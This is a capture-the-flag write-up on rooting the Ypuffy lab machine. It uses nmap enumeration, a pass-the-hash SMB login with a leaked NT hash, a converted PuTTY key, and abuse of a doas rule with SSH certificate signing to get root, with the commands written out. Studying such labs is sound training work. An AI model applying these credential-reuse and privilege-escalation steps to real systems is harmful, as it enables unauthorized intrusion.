Ypuffy - WriteUp
Let’s start with nmap. But let’s spice it up a bit with an additional script:
nmap -sC -sV -oN initial --script discovery 10.10.10.107
The output is quite big. You can the output here.
The script tries to get as much information as possible of your target and in this case shows some LDAP information and the following open ports:
|22, 80, 139, 389, 445|
sambaNTPassword Hash immediately caught my attention.
As this is very juicy information. I paused my enumeration and tried to exploit this. But how?
Password hashes are often used as a substitude to passwords. Which means, you don’t need the original password to authenticate to a service. Just the hash. This is how your corporate single-sign-on stuff works. Otherwise you would have to login every time. So it’s a convenience thing.
The method is called Pass-The-Hash. And of cause there are tools out there, that help
you with this. Like:
pth-smbclient. If you don’t have it, just got to github and get the
After fiddeling around with the options, syntax and where to connect to I managed to connect to alice share:
pth-smbclient --user=alice1978 --pw-nt-hash -m smb3 \\\\10.10.10.107\\alice 0B186E661BBDBDCF6047784DE8B9FD8B
And we find a private key in “ppk” format.
After downloading the file, and trying to use it as a key to access ssh I got an error. This format is not compatible with ssh. So, I tried converting it. A quick googlesearch helped me finding the correct command for this task. But first we need to install putty-tools.
puttygen my_private_key.ppk -O private-openssh -o id_rsa mv ~/.ssh chmod 600 id_rsa ssh -i id_rsa firstname.lastname@example.org
As you can see in the screenshot. A simple
ls gives us the “user.txt”.
uname -a reveals a BSD box. Which was quite handy. Shortly after this box
was released an exploit for the XORG component of most BSD boxes was published. It’s local privesc which gives you root access.
This is something you only get by googleing or being up-to-date with infosec news.
This was the route I took to root the box.
However the intended method was a bit more tricky. While searching the directory structure I noticed
a folder “userca”.
“CA” in this context mostly means “Certificate Authority” and is there to sign certificates or issue new keys. Let’s say: “ssh”.
Furthermore BSD has something like
doas. Let’s check what we can do on this box.
ypuffy$ cat /etc/doas.conf permit keepenv :wheel permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
We indeed can run
ssh-keygen. But when we try, we are prompted for a password. Let’s dig deeper in the ssh route.
There’s a password somewhere for sure.
ypuffy$ cat sshd_config [...] AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
So, apparently we can issue a
curl to the “CA”…I guess, not sure what happens here. I still need to look this up…
Let’s step back and catch up with the XORG exploit first. The exploit is fairly easy to use. Just get it from Exploit-db. It’s very easy to use.
- chmod +x
Let’s get back to the
curl command and check what we can do with it:
ypuffy$ /usr/local/bin/curl "http://127.0.0.1/sshauth?type=principals&username=root" 3m3rgencyB4ckd00r
For whatever reason we get this string back:
3m3rgencyB4ckd00r - obviously the missing password.
Let’s create a key and try signing it.
ypuffy$ ssh-keygen -t rsa ypuffy$ mv id_rsa.pub /tmp ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I "algo" -z 1 id_rsa.pub Signed user key id_rsa-cert.pub: id "algo" serial 1 for 3m3rgencyB4ckd00r valid forever ypuffy$ cp id_rsa-cert.pub /home/alice1978/.ssh/
This seems to work so far. But can we login now?
ypuffy$ ssh root@localhost OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018 ypuffy# id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ypuffy# ls root.txt
This is it. We got the box. =)
See ya next time!